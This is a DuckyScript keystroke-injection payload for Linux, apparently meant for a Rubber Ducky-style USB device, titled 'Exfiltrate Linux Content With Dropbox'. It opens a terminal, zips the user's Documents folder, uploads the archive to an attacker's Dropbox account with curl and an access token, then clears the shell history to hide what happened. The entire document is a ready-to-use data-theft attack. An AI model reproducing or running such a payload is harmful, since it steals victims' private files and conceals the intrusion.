REM ##########################################################
REM #                                                        |
REM # Title        : Exfiltrate Linux Content With Dropbox   |
REM # Author       : Aleff                                   |
REM # Version      : 1.0                                     |
REM # Category     : Exfiltration                            |
REM # Target       : Linux                                   |
REM #                                                        |
REM ##########################################################

REM Requirements:
REM     - Internet Connection
REM     - Dropbox Account
REM     - - DROPBOX_ACCESS_TOKEN

REM Required: Set here your Dropbox access TOKEN
DEFINE #TOKEN example
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload


DEFAULT_DELAY 500
CTRL-ALT t

DELAY 2000
STRINGLN ACCESS_TOKEN="#TOKEN"
STRINGLN USER_NAME=$(whoami)
STRINGLN path="/home/$USER_NAME/Documents"
STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
STRINGLN NAME="$RANDOM.zip"
STRINGLN ZIP_PATH="$path/$NAME"

REM The FOLDER that you want to zip, in this example you want to zip all Documents content
STRINGLN FOLDER="/home/$USER_NAME/Documents/"

REM Delay for zipping operation, it depends by computer power and folder directory
DELAY 10000

STRINGLN if [ -r "$FOLDER" ]; then
STRINGLN zip -r "$ZIP_PATH" "$FOLDER" > /dev/null 2>&1
STRINGLN else
STRINGLN echo   ""
STRINGLN fi

STRINGLN DROPBOX_FOLDER="/$NAME"

STRINGLN curl -X POST DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"

DELAY 2000
STRINGLN history -c
